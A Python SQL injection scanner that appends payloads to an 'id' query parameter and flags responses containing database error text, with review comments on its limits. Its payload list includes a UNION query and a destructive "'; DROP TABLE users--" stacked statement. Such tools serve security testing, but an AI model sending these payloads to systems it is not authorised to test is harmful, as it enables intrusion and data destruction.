sql_Injection_Scanner.py
# sql scanner - detect sql injection vulnerabilities
import requests
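def test_sqli(url, payloads):
    """Probe ``url`` for error-based SQL injection, one GET request per payload.

    Each payload is appended to ``url`` as the ``id`` query parameter. A
    finding is recorded when the lower-cased response body contains one of a
    small set of database error strings.

    Args:
        url: Endpoint under test. ``?id=<payload>`` is appended verbatim, so
            it should not already carry a query string.
        payloads: Iterable of payload strings to send.

    Returns:
        A list of dicts. A match is reported as
        ``{"payload", "severity": "Critical", "url"}``. A request that fails
        is reported in the same list as ``{"error", "severity": "High"}``;
        callers should separate the two by checking for the ``"error"`` key,
        because a scanner failure is not a finding about the target.
    """
    # Substrings looked for in the lower-cased response body.
    # NOTE(review): this is a heuristic. A page that mentions "mysql" in its
    # normal content is reported as vulnerable, and injection that produces no
    # error text (blind or time-based) is not detected, so an empty result is
    # not evidence that the endpoint is safe.
    error_markers = ("sql syntax", "mysql", "syntax error", "unclosed quotation")

    # requests has no default timeout; without one a single unresponsive host
    # stalls the whole scan. A timeout raises a RequestException subclass and
    # is therefore reported through the existing error path below.
    request_timeout = 10  # seconds

    vulnerabilities = []
    for payload in payloads:
        test_url = f"{url}?id={payload}"
        try:
            response = requests.get(test_url, timeout=request_timeout)
        except requests.exceptions.RequestException as e:
            vulnerabilities.append({"error": f"SQLi Scanner Error: {e}", "severity": "High"})
            continue

        # Lower-case the body once instead of once per marker.
        body = response.text.lower()
        if any(marker in body for marker in error_markers):
            vulnerabilities.append({"payload": payload, "severity": "Critical", "url": test_url})
    return vulnerabilities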
# Example payloads passed to test_sqli() by the demo below.
# NOTE(review): the third entry carries a DROP TABLE statement. Where the
# backend really is injectable and executes stacked statements, sending it
# changes data rather than only probing; a detection scan is normally limited
# to payloads with no side effects.
sqli_payloads = [
    "' OR '1'='1",                        # always-true condition (string form)
    "' OR 1=1--",                         # always-true condition, rest commented out
    "'; DROP TABLE users--",              # stacked statement (destructive)
    "' UNION SELECT null, version()--",   # UNION-based read of the DB version
]
# Demo run: scan a placeholder endpoint with the sample payloads and print
# whatever test_sqli() returns (findings and request errors alike).
if __name__ == "__main__":
    url = "http://example.com/login"
    results = test_sqli(url, sqli_payloads)
    print("SQLi Vulnerabilities:", results)